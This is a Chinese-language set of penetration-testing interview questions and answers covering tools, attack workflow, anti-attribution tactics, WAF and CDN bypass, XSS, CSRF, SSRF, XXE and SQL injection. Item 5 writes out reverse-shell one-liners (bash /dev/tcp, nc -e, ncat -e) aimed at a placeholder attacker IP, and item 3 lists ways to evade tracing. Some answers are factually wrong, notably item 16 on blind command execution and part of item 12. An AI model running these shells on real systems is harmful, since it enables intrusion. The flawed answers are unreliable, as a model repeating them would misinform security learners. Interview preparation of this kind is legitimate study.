渗透测试/攻防对抗/应用安全工程师 面试题，你能答几道？

1、渗透测试使用哪些工具？

Burp Suite：Web应用安全测试工具。
Nmap：网络扫描与发现工具。
Metasploit：漏洞利用和安全研究框架。
OWASP ZAP：开源Web应用安全扫描器。
SQLMap：自动SQL注入测试工具。
Cobalt Strike：后渗透测试平台。
Nessus：著名漏洞扫描器。
CrackMapExec：网络枚举和后渗透工具。
Impacket：Python网络安全库。以上工具在合法授权下用于安全评估与测试，严禁非法使用。

2、内外网渗透流程？渗透思路？

a、内外网渗透流程：
目标定义：明确渗透测试目标和范围，确定内外网资源和规则。
信息收集：通过扫描和公开信息搜索搜集内外网资产和漏洞线索。
漏洞探测：运用工具和手工方法查找和验证内外网存在的安全漏洞。
入口突破：利用漏洞进入系统，如外网入口突破和内网横向移动。
权限提升：在成功入侵后提高系统权限至更高层次。
持久化控制：建立后门以维持对目标系统的持续访问。
核心资源定位：深入渗透，寻找和分析关键数据和系统资源。
渗透总结：清理测试痕迹，撰写包含发现、利用过程、风险评级和修复建议的渗透测试报告。
b、渗透思路核心点：
分阶段递进：由浅入深、逐层突破。
权限升级：从低权到高权逐步攀升。
隐蔽操作：模拟真实攻击手法，减少暴露风险。
最小破坏：遵循测试规范，不影响正常业务运行。
全面审视：涵盖技术漏洞和社会工程等方面安全弱点。

3、溯源，如何反溯源隐藏自己？

反溯源隐藏自身：
匿名工具：使用Tor浏览器或其他匿名网络服务，如I2P，加密并随机路由网络流量。
代理与VPN：借助代理服务器或VPN，通过第三方服务器转发数据，隐藏真实IP地址。
层级跳转：通过多层代理链路，增加追踪难度。
混淆通信：对网络流量进行混淆处理，使其难以识别。
安全设备与OS：使用安全操作系统（如Tails），并确保硬件无个人信息关联。
行为隐蔽：改变网络行为模式，避免形成可预测的规律。
加密通信：采用端到端加密工具，确保信息即使被捕获也无法解密。
物理防范：不在不安全的公共Wi-Fi环境下进行敏感操作。
始终确保遵守法律法规，了解没有任何单一方法可以绝对避免被追踪，特别是在面对高度专业的追踪者时。

4、如何绕过waf？

绕过WAF技巧：
数据变形：通过长度溢出、编码转换（如URL编码、Unicode编码）绕过检测规则。
参数变异：利用HTTP参数污染、不同数据格式（JSON/XML）等规避过滤。
协议挖掘：利用HTTP头、Cookies、非标准请求方式避开防护。
伪装技术：修改User-Agent，模拟正常请求来源。
逻辑漏洞：发现并利用后端逻辑缺陷，绕过后端防护。
强调：以上仅为理论知识，应用于合法的安全测试场景，在获得授权的前提下进行。绕过WAF的行为在未经授权的情况下属于违法行为，应当避免。同时，强化WAF策略和及时修补后端逻辑漏洞是防御绕过的根本措施。

5、如何反弹shell？

创建反弹Shell：
Linux 反弹Shell：
Bash命令：在目标机执行 bash -i >& /dev/tcp/攻击者IP/端口 0>&1，攻击者用 nc -lvp 端口 监听。
Python脚本：目标机执行Python命令，攻击者监听同上。
Netcat：目标机执行 nc -e /bin/bash 攻击者IP 端口，攻击者监听同上。
Windows 反弹Shell：
Netcat（ncat）：目标机执行 ncat -e cmd.exe 攻击者IP 端口，攻击者监听同上。
注意事项：
以上操作仅适用于授权渗透测试情景，禁止非法入侵他人计算机。
实际操作中需替换相应的攻击者IP和端口号。
Windows反弹Shell可能还需借助其他工具或更复杂的PowerShell命令。
始终坚守合法合规、尊重网络安全的原则。

6、未授权访问的案例与防御？

案例1：弱密码引发未授权访问
案例：攻击者利用简单密码登录系统窃取数据。
防御：强制复杂密码，定期更换，启用双因素认证，单独管理各系统密码。
案例2：开放数据库服务导致未授权访问
案例：数据库服务未设认证，黑客轻松获取数据。
防御：公网服务启用强认证，限定访问来源，关闭多余端口，定期安全检查与修复漏洞，加密敏感数据。
总体防御策略：
强化身份认证与访问控制，精细权限分配和审核。
严格执行安全配置，关闭多余服务和端口。
定期进行安全培训和意识教育。
建立日志审计系统，及时发现异常访问。
定期进行安全演练和渗透测试。

7、子域名的收集方式？信息收集&如何打入内网获取权限？

a、子域名收集方式：
在线工具：利用DNSdumpster、Sublist3r等工具直接查询。
搜索引擎：通过site语法搜索，或利用API批量查询。
被动收集：分析公开链接、JS代码中提及的子域名。
Whois查询：查看域名注册信息推测子域名。
SSL/TLS证书日志：从证书透明度日志中发掘子域名。
b、打入内网获取权限：
外部突破：利用Web应用、RCE等漏洞入侵外部服务器。
社工攻击：钓鱼邮件、欺诈获取员工登录凭证。
漏洞利用：扫描内网服务，利用漏洞渗透。
中间人攻击：ARP欺骗、DNS劫持篡改内网流量。
客户端漏洞：利用软件漏洞植入恶意代码。
物理接触：插入恶意USB设备或直接接入内网。
再次强调，以上所有操作必须在合法授权的渗透测试环境中进行，任何非法入侵行为都是违法的。

8、如何绕过CDN找真实IP？

绕过CDN找真实IP方法：
查询历史DNS记录和子域名解析。
通过国际线路直接访问，查看响应头部信息。
枚举并尝试访问所有子域名，寻找未加CDN的。
利用第三方服务、安全漏洞（如SSRF、XSS）等尝试获取真实IP。
法律合规途径：与运营者沟通或官方查询。
注意：以上操作须在合法授权的渗透测试或安全研究中进行，非法入侵行为违法。

9、对称与非对称？

对称加密与非对称加密的区别：
对称加密：同一密钥加密解密，速度快，但密钥共享安全性低。
非对称加密：公钥加密，私钥解密；私钥保密，安全性高，但速度相对较慢。
实际应用中，通常结合使用，非对称加密用于安全交换对称密钥，对称加密用于大量数据的快速加密传输

10、TCP三次握手和四次挥手？

a、TCP三次握手：
客户端发起连接请求（SYN），发送 seq=x。
服务器回应确认并请求同步（SYN+ACK），发送 seq=y, ack=x+1。
客户端确认连接（ACK），发送 ack=y+1。
b、TCP四次挥手：
客户端发出断开请求（FIN），表示不再发送数据。
服务器确认客户请求（ACK）。
服务器完成发送后也发出断开请求（FIN）。
客户端确认服务器断开（ACK），连接完全关闭。

11、DOM型XSS如何实现攻击？

a、DOM型XSS攻击是通过以下方式实现的：
攻击者找到能在客户端JavaScript中动态加载用户输入的位置。
注入恶意JavaScript代码。
浏览器执行注入的脚本，由于未对用户输入做有效验证和转义处理。
恶意脚本在受害者的浏览器上下文中运行，窃取敏感信息或进行其他恶意操作。
b、防范DOM型XSS的关键是：
对所有来自不可信源的用户输入进行严格的净化和转义处理。
避免使用不安全的DOM方法插入未经验证的数据到网页中。

12、CSRF，Referer如何绕过？

绕过Referer检查的CSRF方法：
利用老旧或不安全浏览器的Referer缺失或为空的漏洞。
使用img、iframe等标签发起GET请求，通常会携带Referer。
旧版Flash或Silverlight插件可能允许伪造Referer。
利用jsonp或配置不当的CORS绕过同源策略。
用户手动修改浏览器扩展或设置可控制Referer。
WebSocket通信不携带Referer，依赖其防范CSRF不安全。
社会工程学手段诱导用户安装伪造Referer的恶意插件或应用。
注：单纯依赖Referer检查不足以防御CSRF，应结合CSRF Tokens等其他安全措施。

13、CSRF SSRF XSS XXE区别与防护？

CSRF：攻击者伪造用户请求，欺骗服务器执行操作。防护措施包括添加并验证CSRF Token，或检查Referer头（非充分措施）。
SSRF：攻击者诱使服务器向内网发起请求，获取内部资源。防护手段包括使用黑白名单限制请求范围，URL重写和代理验证，或过滤非法IP地址请求。
XSS：攻击者注入恶意脚本至网页，窃取数据或操纵用户浏览器。防护主要包括对用户输入进行转义或净化，设置Content Security Policy，使用HTTP-only Cookie。
XXE：攻击者利用XML解析漏洞注入外部实体，获取服务器内部信息。防护措施包括禁用XML解析器对外部实体的支持，采用安全解析器或严格过滤输入数据中的实体引用

14、XSS的分类以及防御？

a、XSS分类及防御简述：

   1、反射型XSS：
      攻击：诱使用户点击含恶意脚本的URL。
      防御：严格过滤和转义用户输入；在输出到HTML前，对URL参数等进行HTML实体编码。
   2、存储型XSS：
      攻击：将恶意脚本存储在服务器并展示给其他用户。
      防御：严格处理所有用户可控内容；存储和展示时均需转义；采用安全编程模式。
   3、DOM-Based XSS：
      攻击：利用客户端JavaScript处理DOM时注入恶意脚本。
      防御：在DOM操作时净化和转义不可信的客户端数据；避免使用innerHTML等易受攻击的方法。
b、通用防御策略：
输入验证与过滤；
输出转义；
安全编程模式；
实施Content Security Policy (CSP)；
使用HttpOnly Cookie；
提升用户安全意识。

15、SQL注入哪几种方式？如何拿到表数据，order by拿列数的原理

SQL注入种类及拿表数据原理简述：
经典注入：直接注入逻辑判断，UNION注入联合查询其他表。
堆叠注入：使用分号隔开执行额外SQL命令。
时间延迟注入：利用sleep()等函数判断数据真假，实现盲注。
二阶注入：两次注入过程，第二次执行首次注入预留的恶意命令。
ORDER BY拿列数原理：攻击者通过构造ORDER BY子句，尝试按不同列序号排序，如ORDER BY 1、ORDER BY 2...当指定列序号超出实际列数时，数据库会抛出错误，从而推断出表的列数上限。这一步常用于盲注攻击中获取数据库表结构信息。

16、命令执行无回显怎么做？

命令执行无回显： （DNSlog或SMBlog）
Unix/Linux：command > /dev/null 2>&1，将输出重定向至黑洞设备。
Windows批处理：使用@echo off关闭回显，再执行命令。
编程语言：通过编程语言调用命令并捕获输出，选择不打印。
在安全测试中，实现无回显有助于隐蔽执行和收集数据，但仅限于合法授权情境。切勿非法入侵。